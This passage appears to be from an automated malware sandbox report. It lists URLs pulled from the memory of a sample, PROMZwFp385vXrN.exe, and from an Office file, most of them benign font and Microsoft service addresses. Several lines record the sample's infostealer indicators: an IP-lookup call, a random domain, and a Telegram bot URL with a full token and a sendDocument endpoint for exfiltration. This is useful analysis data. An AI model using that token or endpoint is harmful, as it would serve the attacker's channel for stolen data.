                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.505106593.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505144546.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505189322.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlN
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504649154.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersF
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504582264.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersP
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504649154.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersS
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.505144546.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505189322.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersTP
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.503997791.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersg
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.507155731.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersn
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.503961397.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.508657318.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com6=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.508657318.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsF
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd$=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504476580.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comedta
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504476580.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505879437.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comj=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlicY=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.546642632.0000000005C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.505879437.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm/
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496449471.0000000005C42000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496074815.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496494097.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496292759.0000000005C42000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496697085.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496527277.0000000005C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496292759.0000000005C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/H
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496074815.0000000005C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cna-er
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.510497541.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510115416.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.509829844.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509981461.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509871998.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510314930.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510347822.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509783839.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510270514.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm;
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.510115416.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/w=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.502412410.0000000005C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/e=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/e=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.502412410.0000000005C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w=
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.510020800.0000000005C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504305788.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.s
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.K%
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comf(
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comnP(
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.497115569.0000000005C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cna
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.628798614.0000000003332000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wz5PFqmQeks9Nrk59.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.aadrm.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.aadrm.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.cortana.ai
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgappdataPMoZbwPMoZbw.exe/http://YJEXbs.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.office.net
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.onedrive.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://api.scheduler.
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/1673982758%discordapi%yyy
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendDocument
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://augloop.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://cdn.entity.
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://clients.config.office.net/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://config.edge.skype.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://cortana.ai
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://cortana.ai/api
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://cr.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://dev.cortana.ai
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://devnull.onenote.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://directory.services.
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://graph.windows.net
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://graph.windows.net/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
